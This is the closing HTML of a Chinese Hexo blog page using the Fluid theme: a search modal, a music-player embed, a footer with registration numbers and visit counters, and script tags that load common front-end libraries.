        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
      <div class="col-lg-7 mx-auto nopadding-x-md">
        <div class="container custom mx-auto">
          <meting-js server="netease" type="playlist" id="5413938648" fixed="true" theme="#aa55ff"></meting-js>
        </div>
      </div>
    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>使用Hexo框架</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>精品Fluid主题</span></a><br> <span id="timeDate">天数载入中</span><span id="times">...</span><br> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        蜀ICP备2021029058号
      </a>
    </span>
    
      
        <span>
          <a
            href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=51011202000479"
            rel="nofollow noopener"
            class="beian-police"
            target="_blank"
          >
            
              <span style="visibility: hidden; width: 0">|</span>
              <img src="/img/beian.png" srcset="/img/loading.gif" lazyload alt="police-icon"/>
            
            <span>川公网安备 51011202000479号</span>
          </a>
        </span>
      
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  

  

  

  

  

  




  
<script src="//cdn.jsdelivr.net/npm/aplayer@1.10.0/dist/APlayer.min.js"></script>
<script src="//cdn.jsdelivr.net/npm/meting@2.0.1/dist/Meting.min.js"></script>
<script src="/xm_custom/custom.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
